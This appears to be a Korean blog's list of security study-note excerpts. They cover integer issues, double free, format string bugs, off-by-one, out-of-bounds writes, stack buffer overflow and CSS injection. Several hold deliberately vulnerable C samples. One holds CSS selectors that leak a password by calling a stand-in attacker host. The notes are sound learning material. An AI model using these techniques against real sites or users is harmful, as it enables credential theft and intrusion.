Security (80) 썸네일형 리스트형 [systemhacking] Integer Issues 32비트 운영체제에서 size_t는 unsigned int long은 int 64비트 운영체제에서 size_t는 unsigned long long은 long long size_t는 객체의 최대 사이즈이기 때문에 항상 unsigned 32bit 에서는 int가 최대 자료형, 64bit에서는 long long이 최대 묵시적 형 변환에 따른 취약점 대입연산 : 작은 정수 자료형에 큰 정수를 저장하는 경우, 작은 정수의 크기에 맞춰서 상위 바이트가 소멸됨. 정수승격 : char short 같은 자료형이 연산될 때 발생 . char형과 char형의 덧셈의 경우 1byte가 아닌 4byte의 결과 출력 컴퓨터가 int형을 기반으로 연산하기 때문에 발생. 피연산자가 불일치할 경우 형 변환 : int와 double 더.. [systemhacking] Memory corruption 해제된 메모리에 접근하거나 메모리를 할당하고 해제하지 않아 메모리 릭이 발생하는 경우 #include #include int main(void) { char* a = (char *)malloc(100); char *b = (char *)malloc(100); memset(a, 0, 100); strcpy(a, "Hello World!"); memset(b, 0, 100); strcpy(b, "Hello Pwnable!"); printf("%s\n", a); printf("%s\n", b); free(a); free(b); free(a); } : a 두번 해제 #include #include #include int main(void) { char *a = (char *)malloc(100); memset(.. [systemhacking] format string bug format string을 인자로 받는 함수 printf sprintf / snprintf fprintf vprintf / vfprintf vsprintf / vsnprintf 위와 같은 함수에 포맷 스트링을 주면 의도치 않은 값이 출력되거나 저장됨. 출력 #include int main(void) { char buf[100] = {0, }; read(0, buf, 100); printf(buf); } $ ./fsb-1 %x %d bf3977c0 100 $ 파일 저장 #include #include int main(void) { FILE *fp = fopen("log.txt", "w"); char buf[100] = {0, }; read(0, buf, 100-1); fprintf(fp, "BUFFER-L.. [systemhacking] Off-by-one Off-by-one 취약점은 경계 검사에서 하나의 오차가 있을 때 발생하는 취약점. 버퍼의 경계 계산 혹은 반복문의 횟수 계산 시 < 대신 [systemhacking] Out of Boundary Out of boundary는 버퍼의 길이 범위를 벗어나는 인덱스에 접근할 때 발생하는 취약점. #include int main(void) { int win; int idx; int buf[10]; printf("Which index? "); scanf("%d", &idx); printf("Value: "); scanf("%d", &buf[idx]); printf("idx: %d, value: %d\n", idx, buf[idx]); if(win == 31337){ printf("Theori{-----------redacted---------}"); } } win 4byte 깔리고 idx 4byte buf 40byte 스택에 쌓임 win 값을 31337로 만들기 위해 인덱스 11에 접근하여 값 수정 #i.. [systemhacking] 버퍼 오버플로우 버퍼란 지정된 크기의 메모리 공간. 버퍼 오버플로우 : 버퍼가 허용할 수 있는 양의 데이터보다 더 많은 값이 저장되어 버퍼가 넘치는 취약점 버퍼 오버플로우가 발생하는 위치에 따라 스택 버퍼 오버플로우, 힙 오버플로우와 같이 나눠서 부름. 스택 버퍼 오버플로우 // stack-1.c #include #include int main(void) { char buf[16]; gets(buf); printf("%s", buf); } 지역변수 buf는 스택 영역에 16바이트로 저장됨. gets는 사용자가 개행 입력하기 전까지 입력했던 모든 내용을 첫 번째 인자로 전달된 버퍼에 저장. 버퍼를 오버플로우 시켜 ret 영역을 0x41414141로 만들면 성공 Ascii는 Hex Encode 되므로 41을 의미하는 A로 .. [Webhacking] [client-side advanced] Exploit Techniques - CSS Injection CSS의 Selector나 HTTP 요청 생성을 통해 문서 정보 획득 및 CSRF 공격 연계 가능. 공격 예시 password가 SuperSecret인 경우 input[name='userpw'][value^='a']{background: url("http://hacker.dreamhack.com/a");} input[name='userpw'][value^='b']{background: url("http://hacker.dreamhack.com/b");} input[name='userpw'][value^='c']{background: url("http://hacker.dreamhack.com/c");} ... input[name='userpw'][value^='S']{background: url("http.. [Webhacking] [client-side advanced] Exploit Techniques - Dom Clobbering 보호되어 있는 글입니다. 이전 1 2 3 4 5 6 ··· 10 다음